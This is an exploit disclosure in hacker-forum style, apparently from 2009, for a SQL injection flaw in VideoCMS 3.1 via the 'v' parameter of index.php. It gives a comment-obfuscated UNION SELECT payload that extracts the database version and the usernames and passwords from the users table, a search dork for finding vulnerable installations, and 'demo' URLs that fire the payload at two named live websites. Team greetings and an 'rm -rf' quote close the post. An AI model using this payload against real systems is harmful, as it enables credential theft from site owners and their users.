VideoCMS injection Defects

[~] VideoCMS SQL injection vulnerability-(id )#
[~] Author: kaMtiEz (kamzcrew@gmail.com )#
[~] Homepage: http://www.indonesiancoder.com #
[~] Date: Desember 14,200 9 #
#
######################################## ######################################## ###

[Software Information]

[+] Vendor: http://www.codemight.com/
[+] Download :-
[+] Version: 3.1 or lower maybe also affected
[+] Vulnerability: SQL injection
[+] Dork: "Think iT"
[+] Price: dunno
[+] Location: INDONESIA-JOGJA
[+] Description http://www.codemight.com/index.php? M = product & p = 1

######################################## ######################################## ##


[Here we go .. live from jogja city]

[Vulnerable File]

Http: // 127.0.0.1/[kaMtiEz]/index. php? M = video & v = [VALID-ID] [SQL]

[Exploit]

/**/And/**/1 = 2/**/union/**/all/**/select/**/666,666, @ version, concat_ws (0x3a, username, password), 666,666,666/**/from/**/users --

[Demo]

Http://mysingaporetube.com/index.php? M = video & v = 502/**/and/**/1 = 2/**/union/**/all/**/select/**/666,666, @ version, concat_ws (0x3a, username, password), 666,666,666/**/from/**/users --
Http://www.codemight.com/videocms/index.php? M = video & v = 23/**/and/**/1 = 2/**/union/**/all/**/select/**/666,666, @ version, concat_ws (0x3a, username, password), 666,666,666/**/from/**/users --

========================================================== ==========================================

[Thx TO]
[+] Indonesian coder team kill-9 crew kirik crew MainHack ServerIsDown SurabayaHackerLink
[+] Tukulesto, M3NW5, arianom, tiw0L, abah_benu, d0ntcry ..
[+] Contrex, onthel, yasea, bugs, Ronz, Pathloader,
[+] Coracore, Gh4mb4s, Jack-, VycOd, m0rgue a. k. a mbamboenk

[NOTE]

[+] Nyak ama babe gua... tak lupa adik gua ..
[+] Segelas vodka menemaniku setiap malam...: P
[+] Dengerin Radio yach http://antisecradio.fm OK coy?

[QUOTE]

[+] Rm-rf

[EOF]

[+] INDONESIANOCODER TEAM
[+] KILL-9 TEAM